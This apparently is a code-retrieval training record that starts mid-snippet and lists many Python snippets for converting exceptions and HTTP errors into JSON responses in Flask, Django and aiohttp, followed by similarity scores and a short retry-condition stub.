exc.detail\n if type(data) is ErrorDetail:\n data = str(data)\n status_code = exc.status_code\n set_rollback()\n\n elif isinstance(exc, Http404):\n data = \"Not Found\"\n status_code = status.HTTP_404_NOT_FOUND\n set_rollback()\n\n else:\n data = str(exc)\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n\n return smart_response(data, status_code=status_code, headers=headers)", "def jsonify_http_exception(exception: HTTPException):\n return jsonify(exception.description, exception.code)", "def returns_json(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n r = f(*args, **kwargs)\n except HTTPException as e:\n # monkey-patch the headers / body to be json\n headers = e.get_headers()\n for header in headers:\n if 'Content-Type' in header:\n headers.remove(header)\n headers.append(('Content-Type', 'application/json'))\n e.get_headers = lambda x: headers\n e.get_body = lambda x: json.dumps({\"message\": e.description})\n raise e\n if isinstance(r, tuple):\n return Response(r[0], status=r[1], content_type='application/json')\n else:\n return Response(r, content_type='application/json')\n return decorated_function", "def handling_unknown_err(e):\n app.logger.exception(e)\n return resp_json(BaseResp.err(e.name))", "def jsonable_error(status=500, message=\"The Studio servers encountered an error\"):\r\n def outer(func):\r\n @functools.wraps(func)\r\n def inner(request, *args, **kwargs):\r\n if request.is_ajax():\r\n content = json.dumps({\"error\": message})\r\n return HttpResponse(content, content_type=\"application/json\",\r\n status=status)\r\n else:\r\n return func(request, *args, **kwargs)\r\n return inner\r\n return outer", "def handle_exception(e):\n # start with the correct headers and status code from the error\n response = e.get_response()\n # replace the body with JSON\n response.data = json.dumps({\n \"code\": e.code,\n \"name\": e.name,\n \"description\": e.description,\n })\n response.content_type = \"application/json\"\n return response", "def handle_exception(e):\r\n # start with the correct headers and status code from the error\r\n response = e.get_response()\r\n # replace the body with JSON\r\n response.data = json.dumps({\r\n \"code\": e.code,\r\n \"name\": e.name,\r\n \"description\": e.description,\r\n })\r\n response.content_type = \"application/json\"\r\n return response", "def json_err(msg: str) -> Response:\n return jsonify({\"success\": False, \"error\": msg})", "def handle_exception(e):\r\n # start with the correct headers and status code from the error\r\n response = e.get_response()\r\n # replace the body with JSON\r\n response.data = json.dumps({\r\n \"code\": e.code,\r\n \"name\": e.name,\r\n \"description\": e.description,\r\n })\r\n response.content_type = \"application/json\"\r\n return response", "async def creation_error_handler(_: Request, exc: MyCustomException,) -> JSONResponse:\n return JSONResponse(\n content={\"errors\": f\"{exc.name}\"},\n status_code=CustomExceptionCodes.HTTP_419_CREATION_FAILED.value,\n )", "def catch_error(\n exception=None, catch_generic=True,\n exception_label=None,\n # TO FIX: where have this gone??\n # error_code=None,\n **kwargs):\n\n if exception_label is None:\n exception_label = ''\n if len(exception_label) > 0:\n exception_label += ': '\n if exception is None:\n exception = RestApiException\n\n def decorator(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n out = None\n\n try:\n out = func(self, *args, **kwargs)\n\n # Catch the single exception that the user requested\n except exception as 
e:\n\n message = exception_label + str(e)\n if hasattr(e, \"status_code\"):\n error_code = getattr(e, \"status_code\")\n return send_error(self, message, error_code)\n else:\n return send_error(self, message)\n\n # Catch the basic API exception\n except RestApiException as e:\n\n if catch_generic:\n return send_error(self, e, e.status_code)\n else:\n raise e\n\n # Catch any other exception\n except Exception as e:\n if catch_generic:\n return send_error(self, e)\n else:\n raise e\n\n return out\n return wrapper\n return decorator", "def create_error_response(data: Dict[str, str], status_code: int) -> Response:\n resp = jsonify(data)\n resp.status_code = status_code\n return resp", "def handle_error(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response", "def raise_for_json_status(self, response_data: JSON) -> None:\n status = response_data['status']\n if status != '1':\n message = response_data.get('message', 'No error message given')\n raise self.error_class(\n f'Error status \"{status}\" in JSON response: {message}'\n )", "def exceptionhandler(e):\n response = e.get_response()\n response.data = json.dumps({\n \"code\" : e.code,\n \"name\": e.name,\n \"description\": e.description\n })\n response.content_type = \"application/json\"\n\n return response", "def exceptions(e):\n ts = strftime('[%Y-%b-%d %H:%M]')\n tb = format_exc()\n app.logger.error('%s %s %s %s %s 5xx INTERNAL SERVER ERROR\\n%s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n tb)\n return jsonify(message=\"Internal Server Error\"), 500", "def handle_unknown_exception(exception):\n logger.exception(\"Unknown exception encountered:\")\n return Response(\n response=json.dumps(\n {\n \"value\": \"Amplium exception: %s\" % str(exception),\n \"status\": \"ERROR\"\n }\n ),\n status=500,\n mimetype=\"application/json\"\n )", "def invalid_response():\n return Response(\n '{\"error\": \"Invalid request\"}',\n status=400,\n mimetype='application/json'\n )", "def wrapper_view_error(\n view: Any = None, class_exception: Any = None, status: int = None\n) -> Any:\n\n def _decorate(function):\n @functools.wraps(function)\n def wrapped_function(*args, **kwargs):\n try:\n return function(*args, **kwargs)\n except class_exception as obj_exception:\n return Response(data={\"error\": obj_exception.message}, status=status)\n\n return wrapped_function\n\n if view:\n return _decorate(view)\n return _decorate", "def errors_api_wrapped(func):\n\n async def wrapped(self, *args, **kwargs):\n try:\n return await func(self, *args, **kwargs)\n except Exception as ex:\n message = getattr(ex, \"message\", None) or \"Something went wrong\"\n details = getattr(ex, \"details\", None) or str(ex)\n status_code = getattr(ex, \"status_code\", 500)\n logger.exception(\n \"Couldn't perform action: %s. 
Error: %s, Details: %s\", ex, message, details\n )\n return {\"message\": message, \"details\": details}, status_code\n\n return wrapped", "def internal_server_error(error): # pylint: disable=unused-argument\n response = jsonify(\n {\n \"success\": False,\n \"error_code\": 500,\n \"message\": \"Internal Server Error\",\n }\n )\n return response, 500", "def error_response(status_code, message=None):\n payload = {'error': str(status_code)+\" : \"+HTTP_STATUS_CODES.get(status_code, \"Unknown Error\")}\n if message:\n payload['message'] = message\n response = jsonify(payload)\n response.status_code = status_code\n return response", "def jsonify_unknown_exception(exception: Exception):\n current_app.logger.exception('Unhandled exception has been raised!')\n return jsonify(DEFAULT_MESSAGE, 500)", "def _gh_exception(exc_cls, status, data):\n try:\n exc = exc_cls(status, data, None)\n except TypeError:\n # Before PyGithub 1.5, GithubException had only two required arguments.\n exc = exc_cls(status, data)\n return exc", "def dispatch_request(self, *args, **kwargs):\n try:\n return super().dispatch_request(*args, **kwargs)\n except HTTPException as e:\n logger.error(\"HTTP Error on APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": e.code,\n \"message\": e.description\n }, e.code)\n except BaseException as e:\n logger.error(\"Error occurred in APIResource %s\", e, exc_info=1)\n return return_response({\n \"code\": 500,\n \"message\": str(e)\n }, 500)", "def wrap_pecan_controller_exception(func):\n\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except exc.QinlingException as e:\n LOG.error('Error during API call: %s', six.text_type(e))\n return webob.Response(\n status=e.http_code,\n content_type='application/json',\n body=json.dumps(dict(faultstring=six.text_type(e))),\n charset='UTF-8'\n )\n\n return wrapped", "def exception_handler(result, name=\"\"):\n try:\n response_content = result.json()\n # pylint: disable=broad-except\n except Exception:\n response_content = result.text\n\n exc_map = {\n 300: SFDC_MoreThanOneRecord,\n 400: SFDC_MalformedRequest,\n 401: SFDC_ExpiredSession,\n 403: SFDC_RefusedRequest,\n 404: SFDC_ResourceNotFound,\n }\n exc_cls = exc_map.get(result.status_code, SFDC_GeneralError)\n\n raise exc_cls(result.url, result.status_code, name, response_content)", "def http_error_handler(ex, req, resp, params):\n resp.body = encode.encode({\n 'status': 1,\n 'msg': 'HTTP error: ' + ex.status\n })", "def raise_for_status(response):\n http_error_msg = \"\"\n\n if 400 <= response.status_code < 500:\n http_error_msg = \"{} Client Error: {}\".format(\n response.status_code, response.reason\n )\n\n elif 500 <= response.status_code < 600:\n http_error_msg = \"{} Server Error: {}\".format(\n response.status_code, response.reason\n )\n\n if http_error_msg:\n try:\n more_info = response.json().get(\"message\")\n except ValueError:\n more_info = None\n if more_info and more_info.lower() != response.reason.lower():\n http_error_msg += \".\\n\\t{}\".format(more_info)\n raise requests.exceptions.HTTPError(http_error_msg, response=response)", "def bad_request_400(error):\n return jsonify({\n 'success': False,\n 'message': 'Bad request',\n 'error': 400\n }), 400", "def handle_500_error(_error):\n return make_response(jsonify(SERVER_ERROR), 500)", "def handle_exception(self, e):\n if isinstance(e, exceptions.APIException):\n return e.get_response(self.request)\n else:\n exc = exceptions.OtherException(self.request)\n return 
exc.get_response(self.request)", "def exceptions_to_http_status(view_func):\n @wraps(view_func)\n def inner(*args, **kwargs):\n \"\"\"\n Catch exceptions and convert them to django http response objects\n \"\"\"\n try:\n return view_func(*args, **kwargs)\n except DatabaseError as ex:\n return HttpResponseBadRequest(\"Database error: {}\".format(ex))\n except GeoServerError as ex:\n return HttpResponseBadRequest(\"GeoServer error: {}\".format(ex))\n except InvalidData as ex:\n return HttpResponseBadRequest(\"Invalid data: {}\".format(ex))\n except NotFoundError as ex:\n return HttpResponseBadRequest(\"Not found: {}\".format(ex))\n except SettingsError as ex:\n return HttpResponseBadRequest(\"Settings error: {}\".format(ex))\n except UploadError as ex:\n return HttpResponseBadRequest(\"Upload error: {}\".format(ex))\n except Exception:\n LOGGER.exception(\"Internal Server Error.\")\n return HttpResponseServerError(\"Internal Server Error. Please \"\n \"check your input parameters.\")\n return inner", "def error_response(http_response_code: Union[HTTPStatus, int], message: Text) -> JSONResponse:\n\n if isinstance(http_response_code, HTTPStatus):\n http_response_code = http_response_code.value\n\n return JSONResponse(dict(\n code=str(http_response_code),\n message=message\n ), http_response_code)", "def raise_error(self, err_code, response):\n clsname = str(self.__class__).split('.')[-1].split(\"'\")[0]\n raise ERROR_CODES[err_code](\n 'Response Type: \"%s\"\\tResponse: %s' % (\n clsname, response))", "def handle_error(self, e):\n code = getattr(e, 'code', 500) # Gets code or defaults to 500\n if code == 404:\n return self.make_response({\n 'message': 'not-found',\n 'code': 404\n }, 404)\n return super(MyApi, self).handle_error(e) # handle others the default way", "def raise_exception(self, code, rebrandly_response):\n if code == 200:\n return {\n 'status': 'ok',\n 'code': 200,\n 'response': rebrandly_response\n }\n # Everything went well, continue.\n elif code == 400:\n raise exc.BadRequestError(rebrandly_response.code, rebrandly_response.message)\n elif code == 401:\n raise exc.NotAuthorizedError(rebrandly_response.code, rebrandly_response.message)\n elif code == 403:\n if rebrandly_response.code == 'AlreadyExists':\n raise exc.AlreadyExistsError(rebrandly_response.code, rebrandly_response.message)\n else:\n raise exc.InvalidFormatError(rebrandly_response.code, rebrandly_response.message)\n if code == 404:\n raise exc.NotFoundError(rebrandly_response.code, rebrandly_response.message)\n if code == 500:\n raise exc.InternalServerError(rebrandly_response.code, rebrandly_response.message)\n if code == 502:\n raise exc.BadGatewayError(rebrandly_response.code, rebrandly_response.message)\n if code == 503:\n raise exc.APIUnavailableError(rebrandly_response.code, rebrandly_response.message)\n if code == 504:\n raise exc.APITimeoutError(rebrandly_response.code, rebrandly_response.message)", "def error_response(error_text):\n return Response(json.dumps({'error' : error_text}), status=404, mimetype='application/json')", "def handle_root_exception(error):\n code = 400\n if hasattr(error, 'code'):\n code = error.code\n d = dict(_error=str(error))\n s = json.dumps(d)\n return (s, code, [('Content-Type', 'application/json')])", "def code_exception_handler(exc, context):\n if isinstance(exc, Http404):\n exc = exceptions.NotFound()\n elif isinstance(exc, PermissionDenied):\n exc = exceptions.PermissionDenied()\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', 
None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n # get the Error codes instead of Error messages\n data = exc.get_codes()\n else:\n data = {'detail': exc.get_codes()}\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n return None", "def handle_exceptions(\n generic_message='An error has occurred',\n status_code=500,\n error_handler=None):\n @web.middleware\n async def middleware(request, handler):\n try:\n response = await handler(request)\n return response\n except web.HTTPException:\n raise\n except Exception as ex:\n message = str(ex)\n if error_handler:\n error_handler(request, ex)\n logging.exception('Error: %s', message)\n return web.json_response(\n {'error': generic_message},\n status=status_code\n )\n return middleware", "def internal_error_400(error):\n return jsonify({'error':\n \"Die Anfrage wurde syntaktisch falsch erstellt.\"}), 400", "def _raise_error(self, status: int, result: dict):\n raise APIError(status, self._get_error_text(result))", "def _request(self, method, *args, **kwargs):\n try:\n r = getattr(requests, method)(*args, **kwargs)\n except AttributeError:\n raise NewRelicException(\n 'Method {} is unsupported by requests module'\n .format(method)\n )\n except requests.exceptions.Timeout:\n raise Timeout('Request timed out after {} seconds'\n .format(self.timeout))\n\n if r.status_code < 200 or r.status_code > 299:\n # Try to work out all known errors into separate exceptions\n if r.status_code == 401:\n try:\n error_message = r.json()['error']['title']\n except (KeyError, ValueError):\n raise UnathorizedError(\n 'User is not authorized to perform requested operation'\n )\n else:\n raise UnathorizedError(error_message)\n if r.status_code == 402:\n raise ChecksLimitExceeded(\n \"Creating the monitor will increase your scheduled checks \"\n \"past your account's purchased check limit.\"\n )\n elif r.status_code == 404:\n try:\n error_message = r.json()['error']['title']\n except (KeyError, ValueError):\n raise ItemNotFoundError(\n 'Requested item not found. '\n 'No error message was provided by server.'\n )\n else:\n raise ItemNotFoundError(error_message)\n else:\n # If we don't know what to do with specific error code\n # ( most likely it's 400 )\n # We at least try to get error message from the response\n try:\n response_errors = r.json()['errors']\n raise NewRelicException(\n \"The following errors were returned by server:\\n{}\"\n .format('\\n'\n .join(\n [x['error'] for x in response_errors]\n ))\n )\n # Sometimes API does not return any useful information.\n # In this case that's just an HTML page\n # reporting 400 instead of JSON.\n # We will just return an error code in this case.\n except ValueError:\n raise NewRelicException(\n 'Got unexpected response code {}. 
'\n 'No additional information provided by server.'\n .format(r.status_code)\n )\n return r", "def handle_error(self, message):\n data = {\n \"success\": False,\n \"error\": message\n }\n\n return JsonResponse(data, status=200)", "def handle_api_error(resp):\n content = yield resp.json()\n\n headers = HeaderWrapper(resp.headers)\n\n try:\n err = content['error']\n except (KeyError, TypeError):\n raise error.APIError(\n \"Invalid response object from API: %r (HTTP response code \"\n \"was %d)\" % (content, resp.code),\n resp, resp.code, content, headers)\n\n if resp.code in [400, 404]:\n raise error.InvalidRequestError(\n err.get('message'), err.get('param'),\n resp, resp.code, content, headers)\n elif resp.code == 401:\n raise error.AuthenticationError(\n err.get('message'),\n resp, resp.code, content, headers)\n elif resp.code == 402:\n raise error.CardError(\n err.get('message'), err.get('param'), err.get('code'),\n content, resp.code, resp, headers)\n else:\n raise error.APIError(\n err.get('message'), content, resp.code, resp, headers)", "def format_exception(self):\n if isinstance(self.message, dict):\n return self.message, self.status_code\n return Request.format_exception(self.message, self.status_code)", "def raise_error(msg: str, code: int = 400) -> None:\n response = make_response(jsonify(message=msg), code)\n abort(response)", "def handle_exception(self,exc):\n logger.error(f\"Exception in request: {traceback.format_exc()}\")\n status_obj = status.HTTP_400_BAD_REQUEST\n if type(exc) is response.Http404:\n status_obj = status.HTTP_404_NOT_FOUND\n return Response(\n MediaUtil.generate_error_image(\n status_obj,\n str(exc),\n self.request.accepted_renderer.format),\n status=status_obj)", "def json_or_error(response):\n if 200 <= response.status_code < 300:\n if response.content:\n return response.json()\n else:\n # Response has no body. Return a status in a way that is consistent with other requests\n return {\n 'status': 'SUCCESS',\n 'httpStatusCode': response.status_code,\n 'httpStatus': httplib.responses[response.status_code],\n }\n else:\n raise JsonApiError('API request to {} failed with HTTP status {}: {}'.format(\n response.url, response.status_code, response.text))", "def raise_for_status(response: Response):\n\n if response.status_code != 200:\n error_body = response.json()['error']\n code = error_body['code']\n message = error_body['message']\n description = error_body['description']\n\n raise TradeException(status_code=response.status_code, code=code,\n message=message,\n description=description)\n\n return response", "def internal_server_error(error):\n return flask.jsonify({\"error\": \"Internal Server Error\"}), 500", "def error(msg=\"Invalid query\", code=400):\n\tjson = {'error': msg}\n\t#return jsonify(json), code\n\tabort(make_response(jsonify(json), code))" ]
[ "0.73746616", "0.73421353", "0.73373085", "0.7094187", "0.7060387", "0.70266795", "0.7011387", "0.69837064", "0.69805527", "0.6943718", "0.6921114", "0.6909217", "0.69065756", "0.6879482", "0.67980826", "0.67973834", "0.67954606", "0.678849", "0.6778472", "0.67188394", "0.67105824", "0.6700431", "0.66831297", "0.6679369", "0.66791004", "0.66744596", "0.66729754", "0.6670976", "0.66583186", "0.66565096", "0.66353446", "0.6634591", "0.6633283", "0.66218936", "0.6616202", "0.6611066", "0.6598119", "0.65927106", "0.65908086", "0.6584683", "0.6582393", "0.65622807", "0.65528923", "0.65528244", "0.65460455", "0.6546045", "0.6543433", "0.6530074", "0.65222096", "0.651461", "0.6490732", "0.6467759", "0.64566946", "0.6448714", "0.644656", "0.6440691", "0.64270705", "0.642577", "0.64173037", "0.6409432", "0.64067024", "0.6406649", "0.63916385", "0.6390292", "0.63892907", "0.636886", "0.6360966", "0.6360625", "0.63553375", "0.634025", "0.6333507", "0.6321357", "0.6314338", "0.62989813", "0.6293148", "0.6288705", "0.62875783", "0.6282675", "0.62791497", "0.627823", "0.6277433", "0.6275079", "0.6271917", "0.6270765", "0.62686294", "0.6268288", "0.62582517", "0.6245229", "0.6233216", "0.6231365", "0.62311053", "0.6230973", "0.62295306", "0.62171805", "0.62168306", "0.62118", "0.6210882", "0.62053907", "0.6204348", "0.6204135", "0.61909294" ]
0.0
-1
Conditions for repeating a request. If it returns True, the request will be repeated.
def retry_request( self, tapi_exception, error_message, repeat_number, response, request_kwargs, api_params, **kwargs ): return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _do_request(self):\n\n if time.time() < self._next_request:\n return False\n else:\n return True", "def valid_in_request(self):\n return self._repeatable[0] is not None", "def valid_multiple_in_request(self):\n return self._repeatable[0] is True", "def valid_in_response(self):\n return self._repeatable[1] is not None", "def only_once(self) -> bool:\n return self.times == 1", "def valid_multiple_in_response(self):\n return self._repeatable[1] is True", "def is_repetition(self):\n return self.id == 1", "def request_seen(self, request):\n fp = request_fingerprint(request)\n if self.server.sismember(self.key, fp):\n return True\n self.server.sadd(self.key, fp)\n return False", "def request_seen(self, request):\n fp = request_fingerprint(request)\n # This returns the number of values added, zero if already exists.\n added = self.server.sadd(self.key, fp)\n return added == 0", "def addRequest(self, userId):\n flag = False\n requestTimes = self.verifyLog(userId)\n\n if requestTimes == 0:\n self.addLog(userId)\n flag = True\n elif requestTimes < 5:\n flag = True\n\n if flag:\n self.increaseTimes(userId)\n\n return flag", "def get_repeat(self) -> bool:\n return self._select_interface(self._rc_get_repeat,\n self._http_get_repeat)", "def _unique_build_request(buildername, revision):\n global SCHEDULING_MANAGER\n sch_mgr = SCHEDULING_MANAGER\n\n if is_downstream(buildername):\n return True\n else:\n if revision in sch_mgr and buildername in sch_mgr[revision]:\n LOG.info(\"We have already scheduled the build '%s' for \"\n \"revision %s during this session. We don't allow \"\n \"multiple requests.\" % (buildername, revision))\n return False\n else:\n if revision not in sch_mgr:\n sch_mgr[revision] = []\n\n sch_mgr[revision].append(buildername)\n return True", "def testReplyWhenRequestAlreadyExecuted(looper, nodeSet, client1, sent1):\n # Since view no is always zero in the current setup\n looper.run(eventually(checkSufficientRepliesRecvd,\n client1.inBox,\n sent1.reqId,\n 2,\n retryWait=.5,\n timeout=5))\n originalRequestResponsesLen = nodeCount * 2\n duplicateRequestRepliesLen = nodeCount # for a duplicate request we need to\n client1.nodestack._enqueueIntoAllRemotes(sent1, None)\n\n def chk():\n assertLength([response for response in client1.inBox\n if (response[0].get(f.RESULT.nm) and\n response[0][f.RESULT.nm][f.REQ_ID.nm] == sent1.reqId) or\n (response[0].get(OP_FIELD_NAME) == REQACK and\n response[0].get(f.REQ_ID.nm) == sent1.reqId)],\n originalRequestResponsesLen + duplicateRequestRepliesLen)\n\n looper.run(eventually(\n chk,\n retryWait=1,\n timeout=20))", "def test_request_created_once(self):\n\n usual_user = UserFactory(\n username='Usual User',\n email='[email protected]',\n )\n token = Token.objects.get(user=usual_user)\n self.client.credentials(\n HTTP_AUTHORIZATION=f'Token {token.key}')\n data = {'team': self.team.id}\n self.client.post(reverse('api:user-team-requests-list'), data=data) # first request\n response = self.client.post(reverse('api:user-team-requests-list'), data=data) # second request\n self.assertEqual(response.status_code, forum_status.STATUS_222_USER_ALREADY_REQUESTED)", "def everytime(self):\n return True", "def should_refresh_client_fnc(response):\n return not response", "def is_once(self):\n return self.subscription_list.mode == gnmi_pb2.SubscriptionList.ONCE", "def _repeat(a, repeats, batch_size, training_batch_size):\n return tf.cond(tf.equal(batch_size, 1),\n lambda: utility.repeat(a, repeats, num_repeats=2),\n lambda: utility.repeat(a, repeats, 
training_batch_size))", "def _result_already_returned(self):\n return self.deferred.called", "def __call__(self):\n hub.sleep(random.randint(1, self.interval))\n while True:\n self.send_req()\n self.reply_pending = True\n hub.sleep(self.interval)\n if self.reply_pending:\n self.no_response()", "def would_retransmit(self):\n return not self.my_pending_requests.is_empty()", "def check_repeated_task(self, task):\n task_status = task in self.tasks_asked\n\n # append if never asked\n if task_status == False:\n self.tasks_asked.append(task)\n\n return task_status", "def check_for_requests(self):\n while True:\n doc = self.cc.requests_coll.find_one_and_delete(\n {'receiver': 'validator'}, sort=[('_id', pymongo.ASCENDING)]\n )\n if doc is None:\n break\n\n if doc['action'] == 'validate_upload':\n print(\"fulfil request: set valid: {} for upload_id {}\".format(doc['valid'], doc['upload_id']))\n self.validate_upload(ObjectId(doc['upload_id']), doc['valid'])", "def apiCallRepeater(repeatList):\n confirm = input(\"We're about to make \" + str(len(repeatList)) + \" API calls, is this OK? (Y/N) > \")\n if confirm == \"Y\" or confirm == 'y':\n print(\"OK\")\n accts = fetchById(repeatList)\n return accts\n else:\n print('K, byeeee')\n sys.exit()", "def _may_cache(self, request, response=None):\n # any successful request may be cached\n return ((HTTPStatus.OK <= response.status_code < HTTPStatus.BAD_REQUEST)\n if response else True)", "def is_duplicate(self, event):\n # only checking remote and expected remote for the endpoint. We don't care about names,\n # interfaces/tunnels, or pctags for dup stale suppression\n return (self.remote == event.remote and self.expected_remote == event.expected_remote)", "def should_reschedule(self, iteration):\n if not self.max_iterations:\n return True\n return iteration < self.max_iterations", "def is_rate_validated(from_no):\n from_key_time = \"from_time_\"+from_no\n from_key_count = \"from_count_\" + from_no\n\n if not get_cache(from_key_time) or not get_cache(from_key_count):\n set_cache(from_key_time, time.time())\n set_cache(from_key_count, 1)\n return True\n cached_time = get_cache(from_key_time)\n time_diff = time.time() - cached_time\n cached_count = get_cache(from_key_count)\n\n if time_diff < RATE_LIMIT_DURATION and cached_count >= RATE_LIMIT_COUNT:\n return False\n elif time_diff > RATE_LIMIT_DURATION:\n set_cache(from_key_time, cached_time + RATE_LIMIT_DURATION)\n set_cache(from_key_count, 1)\n return True\n else: # cached_count < RATE_LIMIT_COUNT\n # print(\"hit from -%s, count - %s\" % (from_no,cached_count))\n set_cache(from_key_count, cached_count+1)\n return True", "def is_repeat(self, state):\n\t\tif not self.state.repeats():\n\t\t\treturn False\n\t\treturn state.repeated_rep() in self.visitedStates", "def request_safe(self, url_request_safe, method='GET', headers_request_safe=None, data_request_safe=None, params_request_safe=None, mood_looptry=False, stream_request_safe=False):\n while True:\n if method == 'GET':\n tic = time.time()\n try:\n res_request_safe = self.session.get(\n url_request_safe,\n headers=headers_request_safe,\n stream=stream_request_safe,\n params=params_request_safe,\n timeout=4\n )\n except requests.exceptions.Timeout:\n self.time_request.append(time.time()-tic)\n print('time out request')\n continue\n self.time_request.append(time.time()-tic)\n # status code filter\n if res_request_safe.status_code in [500,560]:\n print(f'{res_request_safe.status_code} status code')\n time.sleep(2)\n continue\n return True, res_request_safe\n elif 
method == 'POST':\n tic = time.time()\n try:\n res_request_safe = self.session.post(\n url_request_safe,\n headers=headers_request_safe,\n data=data_request_safe,\n stream=stream_request_safe,\n params=params_request_safe\n )\n except requests.exceptions.Timeout:\n self.time_request.append(time.time()-tic)\n print('time out request')\n continue\n self.time_request.append(time.time()-tic)\n # status code filter\n if res_request_safe.status_code in [500]:\n print(f'{res_request_safe.status_code} status code')\n time.sleep(2)\n continue\n return True, res_request_safe", "async def __call__(self, request, **kwargs):\n cache_key = kwargs.pop('cache_key', None)\n sticky_key = kwargs.pop('sticky_key', None)\n cache_revalidate = kwargs.pop('cache_revalidate', None)\n if cache_key is not None and sticky_key is not None:\n raise AssertionError(\n 'expect at most one: cache_key=%r, sticky_key=%r' %\n (cache_key, sticky_key)\n )\n if cache_key is not None:\n return await self._try_cache(\n self._cache,\n cache_key,\n cache_revalidate,\n request,\n kwargs,\n )\n if sticky_key is not None:\n return await self._try_cache(\n self._unbounded_cache,\n sticky_key,\n cache_revalidate,\n request,\n kwargs,\n )\n\n circuit_breaker_key = kwargs.pop('circuit_breaker_key', None)\n if circuit_breaker_key is None:\n circuit_breaker_key = urllib.parse.urlparse(request.url).netloc\n\n breaker = self._circuit_breakers.get(circuit_breaker_key)\n for retry_count in itertools.count():\n\n # Check rate limit out of the breaker async-with context to\n # avoid adding extra delay in the context so that, when the\n # breaker is in YELLOW state, another request may \"go\" into\n # the context as soon as the previous one completes.\n await self._rate_limit()\n\n async with breaker:\n response, backoff = await self._loop_body(\n request, kwargs, breaker, retry_count\n )\n if response is not None:\n return response\n\n # Call `sleep` out of the breaker async-with context for the\n # same reason above.\n await timers.sleep(ASSERT.not_none(backoff))\n\n ASSERT.unreachable('retry loop should not break')", "def getAllowRepetition(self):\n return self.__allowRepetition", "def call_once(self, request=None, *args, **kwargs):\n if request is not None:\n self.request = request\n\n config = self.request.configuration\n if config.http_method != EBConsts.HTTP_METHOD_POST or config.method != EBConsts.METHOD_REST:\n raise Error('Not implemented yet, only REST POST method is allowed')\n\n url = self.request.url if self.request.url is not None else self.build_url()\n logger.debug(\"URL to call: %s\", url)\n\n # Do the request\n resp = requests.post(url, json=self.request.body, timeout=config.timeout, headers=self.request.headers)\n self.last_resp = resp\n return self.check_response(resp)", "def check_if_should_respond(self, has_been_mentioned) -> bool:\n should_respond = random.random() < self.response_chance\n\n return should_respond", "def request() -> None:\n\t_flag.set()", "def isRepeated(self):\n return self._field.label == FieldDescriptor.LABEL_REPEATED", "def check_inflight_already_running(self, user: Identifier) -> bool:\n with self._lock:\n for flow in self.in_flight:\n if flow.requestor == user:\n return True\n return False", "def _is_follow_request(environ, result):\n r = Request(environ)\n if r.params.get(\"action\") == \"follow\":\n return True\n else:\n return False", "def _is_limited(request, rate, rl):\n def inner(*args, **kwargs):\n is_limited = rl.is_limited(*args, **kwargs)\n\n if is_limited:\n messages.error(\n request,\n 
_(\"Too many submissions, wait %(time)s.\") % {\n 'time': rate.split('/')[1]})\n\n return is_limited\n\n return inner", "def can_i_create_claim(self, request):\n\n ip = get_client_ip(request)\n stored = self._get(ip)\n\n if not stored or type(stored) != list:\n self._set(ip, [time.time()])\n return True\n else:\n stored.append(time.time())\n self._set(ip, stored)\n\n # return not len(stored) > settings.CLAIMS_PER_HOUR\n return not len(stored) > self.moderator.claims_per_hour", "def over_request_limit(last_request: datetime) -> bool:\n if last_request is None:\n return False\n if last_request is not None and isinstance(last_request, datetime) and last_request < datetime.utcnow():\n difference = datetime.utcnow() - last_request\n return difference.seconds < current_app.config['TIME_BETWEEN_REQUESTS']\n return True", "def rate_limiting(cls):\n this_click_time = time.time()\n time_to_last_click = None\n if cls.last_click_time:\n time_to_last_click = this_click_time - cls.last_click_time\n cls.last_click_time = this_click_time\n return time_to_last_click and time_to_last_click < 0.7", "def repeat_every(repeats=5, every=2):\n\n def repeat_wrapper(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n for _ in range(repeats):\n value = func(*args, **kwargs)\n if value:\n return value\n time.sleep(every)\n\n return func_wrapper\n\n return repeat_wrapper", "def repeat(self):\n return self._get('repeat')", "def can_request_more():\n # Note: Files are restored in pairs (so we multiply by 2)\n active_requests = jobtracker.query(\"SELECT IFNULL(SUM(numrequested), 0) \" \\\n \"FROM requests \" \\\n \"WHERE status='waiting'\", fetchone=True)\n to_download = jobtracker.query(\"SELECT * FROM files \" \\\n \"WHERE status NOT IN ('downloaded', \" \\\n \"'added', \" \\\n \"'deleted', \" \\\n \"'terminal_failure')\")\n if active_requests == None:\n\tactive_requests = 0\n num_to_restore = active_requests\n num_to_download = len(to_download)\n used = get_space_used()\n reserved = get_space_committed()\n\n can_request = ((num_to_restore+num_to_download) < config.download.numrestored) and \\\n (used+reserved < config.download.space_to_use)\n return can_request", "def repeat(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"repeat\")", "def retry(times):\n return repeat_with_success_at_least(times, 1)", "def skip(self):\n if not self.helper_view.newDataOnly():\n return False\n\n if self.request.steps[-1].startswith(\"++add++\"):\n return False\n if self.request.method != \"PATCH\":\n # restapi calls\n return False\n return True", "def test_api_requests_limited(self):\n\n did_reach_rate_limit = False\n for _ in range(110):\n response = self.send_get('Participant', expected_status=None)\n if response.status_code == TooManyRequests.code:\n did_reach_rate_limit = True\n break\n\n self.assertTrue(did_reach_rate_limit)", "def partial(self):\n return (self.id == 0)", "def requested() -> bool:\n\treturn _flag.is_set()", "def testReponse(question, reponse):\r\n if reponse == question[5]:\r\n return True\r\n else:\r\n return False", "def use_proxy(self, request):\n if self.adsl:\n return True\n if \"depth\" in request.meta and int(request.meta['depth']) <= 2:\n return False\n i = random.randint(1, 10)\n return i <= 2", "def use_proxy(self, request):\n #if \"depth\" in request.meta and int(request.meta['depth']) <= 2:\n # return False\n #i = random.randint(1, 10)\n #return i <= 2\n return True", "def repeat_donor(self, name, zip_code, year):\n donor = Donor(name, zip_code)\n if donor in 
